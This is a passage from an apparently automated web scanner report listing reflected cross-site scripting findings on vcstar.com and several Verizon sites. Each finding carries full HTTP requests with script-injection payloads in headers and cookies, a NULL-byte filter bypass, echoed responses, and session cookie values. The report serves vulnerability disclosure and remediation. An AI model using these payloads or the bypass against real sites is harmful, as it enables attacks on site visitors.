2.860. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcstar.com
Path:   /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload %008502c--><script>alert(1)</script>2af61acfced was submitted in the User-Agent HTTP header. This input was echoed as 8502c--><script>alert(1)</script>2af61acfced in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/?partner=RSS HTTP/1.1
Host: www.vcstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%008502c--><script>alert(1)</script>2af61acfced
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 19 Nov 2010 23:53:55 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
Content-Length: 144724
X-Varnish: 1798712776
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<!-- User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%008502c--><script>alert(1)</script>2af61acfced -->
...[SNIP]...

2.861. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcstar.com
Path:   /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 5995b--><a>76a3fafdb41 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/?partner=RSS HTTP/1.1
Host: www.vcstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5995b--><a>76a3fafdb41
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:12:33 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
Content-Length: 143614
X-Varnish: 844981896
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<!-- User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5995b--><a>76a3fafdb41 -->
...[SNIP]...

2.862. http://www.vcstar.com/news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vcstar.com
Path:   /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 8a2ec--><script>alert(1)</script>1ec4a024f75 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /news/2010/aug/05/barclays-bank-h1-net-profit-up-29-pct-to-39-bln/ HTTP/1.1
Host: www.vcstar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8a2ec--><script>alert(1)</script>1ec4a024f75
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 17:12:20 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
Content-Length: 143662
X-Varnish: 1938600829
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<!-- User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8a2ec--><script>alert(1)</script>1ec4a024f75 -->
...[SNIP]...

2.863. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12792</script><script>alert(1)</script>85d85e30042 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script>alert(1)</script>85d85e30042
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "a821b7c7c96c1edc411967617847d9ee"
Last-Modified: Sat, 20 Nov 2010 01:51:17 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 01:51:17 GMT
Connection: close
Set-Cookie: BERT=VRID%3d035c7296-52e1-4eea-beab-671dfdb451f1|VTID%3d45df8a3c-e08a-467b-9bd9-ee6969a25fcd|SX%3d1290219077|VP%3d1|RMC%3dxg|LP%3den; expires=Fri, 20 Nov 2015 06:55:01 GMT; domain=www.verizonbusiness.com; path=/
Expires: Thu, 19 Nov 2009 19:51:17 GMT
Content-Length: 28871

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">

<head>
<script language="JavaScript" type="text/javascript">
var regC = /https?:\/\/.*?\/\
...[SNIP]...
en", "flash2", "1000", "375", "6", "",flashvars,flashparams,{},function(e){
var ua="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.712792</script><script>alert(1)</script>85d85e30042";
var q="<q>
...[SNIP]...

2.864. http://surround.verizon.net/ [POPLocation cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://surround.verizon.net
Path:   /

Issue detail

The value of the POPLocation cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83425"><script>alert(1)</script>c96bc9b62c7 was submitted in the POPLocation cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?WT.ti=Central/Header/vzsurround_lnkout26041 HTTP/1.1
Host: surround.verizon.net
Proxy-Connection: keep-alive
Referer: http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout26041%22%3balert(1)//db67067f088
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=zcvrDqDCEfzjihhJS66BfaEFlD3HEFHW3GVbInZgj8SA319AMKqf4yg71g1hjUAOTbjuCbUQzi4kRU0-3N1RRyyUr1RMXeHMYtoqYlK1i8gRIAxIs2FMxcW66yygkE-0uRohwuq5lp3oXuU5Npq2SOj88341; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; op671loginhomegum=a00300300126blj05h3mbe643; op671loginhomeliid=a00300300126blj05h3mbe643; ASP.NET_SessionId=pvudeu55p1hbezqn540ctq55; gdOLg1tcWl2vb5747c12OKfxPogzsZOeCwiB1F9CFwkeGFuMslcaoaTNgERD6DPGWQnEUSoNgwmU-f-XiZIW62TLfVQUInggPtV1AdYi4lpDXn8f0=; WT_FPC=id=26a4f4f7be793ac8b5a1290210388683:lv=1290350094132:ss=1290350094132; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=83425"><script>alert(1)</script>c96bc9b62c7; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; product_type=Unknown; product_type=Unknown

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:26:00 GMT
Connection: close
Set-Cookie: i2nveulCTuJKDCTeDQ1ggQCTaXdVY0t9Offa4pFqFWgMs5AjUKwO98gL6KgcFovNfg5zV9-et70auL1zLFBaWxKtIXaeRvjnCclofHy4HptVH6CX0=; path=/
Content-Length: 28570


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Verizon Surround
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="DCS.dcsid" conten
...[SNIP]...
rtype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=83425"><script>alert(1)</script>c96bc9b62c7&search=">
...[SNIP]...

2.865. http://surround.verizon.net/ [POPLocation cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://surround.verizon.net
Path:   /

Issue detail

The value of the POPLocation cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d09ad'-alert(1)-'bfc29bacc1b was submitted in the POPLocation cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?WT.ti=Central/Header/vzsurround_lnkout26041 HTTP/1.1
Host: surround.verizon.net
Proxy-Connection: keep-alive
Referer: http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx?bm=webt_vzsurround&WT.ti=Central/Header/vzsurround_lnkout26041%22%3balert(1)//db67067f088
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=zcvrDqDCEfzjihhJS66BfaEFlD3HEFHW3GVbInZgj8SA319AMKqf4yg71g1hjUAOTbjuCbUQzi4kRU0-3N1RRyyUr1RMXeHMYtoqYlK1i8gRIAxIs2FMxcW66yygkE-0uRohwuq5lp3oXuU5Npq2SOj88341; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; op671loginhomegum=a00300300126blj05h3mbe643; op671loginhomeliid=a00300300126blj05h3mbe643; ASP.NET_SessionId=pvudeu55p1hbezqn540ctq55; gdOLg1tcWl2vb5747c12OKfxPogzsZOeCwiB1F9CFwkeGFuMslcaoaTNgERD6DPGWQnEUSoNgwmU-f-XiZIW62TLfVQUInggPtV1AdYi4lpDXn8f0=; WT_FPC=id=26a4f4f7be793ac8b5a1290210388683:lv=1290350094132:ss=1290350094132; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=d09ad'-alert(1)-'bfc29bacc1b; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; product_type=Unknown; product_type=Unknown

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 22:26:01 GMT
Connection: close
Set-Cookie: MozdXUWOZMAmanjLy-sRcPJhM96uF9T1M8lLC03BdhOOBvpyvkK-Czehh0PZkys77SspCygVO5Y2MSpoE1mPtywNVbVSnZyz8Nw_XhnAlQZhnol40=; path=/
Content-Length: 28646


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Verizon Surround
</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="DCS.dcsid" conten
...[SNIP]...
rtype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=d09ad'-alert(1)-'bfc29bacc1b&search='
document.getElementById('Top1').src = url;
}
function ShowHideAdTop1(sShow) {
var display = ((sShow=="show") ? "block" : "none"); document.getElementById('Top1').style.display = disp
...[SNIP]...

2.866. http://www22.verizon.com/Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cddfb'><script>alert(1)</script>30cb0779e1a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcddfb'><script>alert(1)</script>30cb0779e1a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 68156
Expires: Sat, 20 Nov 2010 00:18:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:18:40 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXcddfb'><script>alert(1)</script>30cb0779e1a; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet:&nbsp;Compare to&nbsp;Cable
</title><link rel="stylesheet" type="text/css" href="/Content/Commonfiles/includes/css/pro
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXCDDFB'><SCRIPT>ALERT(1)</SCRIPT>30CB0779E1A ' />
...[SNIP]...

2.867. http://www22.verizon.com/Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b421a'><script>alert(1)</script>297c29e43fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb421a'><script>alert(1)</script>297c29e43fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61767
Expires: Sat, 20 Nov 2010 00:15:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:42 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=TXb421a'><script>alert(1)</script>297c29e43fb; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:42 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB421A'><SCRIPT>ALERT(1)</SCRIPT>297C29E43FB ' />
...[SNIP]...

2.868. http://www22.verizon.com/Residential/DirecTV/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50cb2'><script>alert(1)</script>84521e8362 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX50cb2'><script>alert(1)</script>84521e8362; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63787
Expires: Sat, 20 Nov 2010 00:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX50cb2'><script>alert(1)</script>84521e8362; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX50CB2'><SCRIPT>ALERT(1)</SCRIPT>84521E8362 ' />
...[SNIP]...

2.869. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7f4a'><script>alert(1)</script>12ba1c0fab5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 179664
Expires: Sat, 20 Nov 2010 00:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | DirecTV | Channels
</title><meta name="keywords" content="direct tv channels, hd tv channels, hd channels, tv channels, dvr channels, dire
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE7F4A'><SCRIPT>ALERT(1)</SCRIPT>12BA1C0FAB5 ' />
...[SNIP]...

2.870. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/DirecTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4eb83'><script>alert(1)</script>d3ff6108a2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

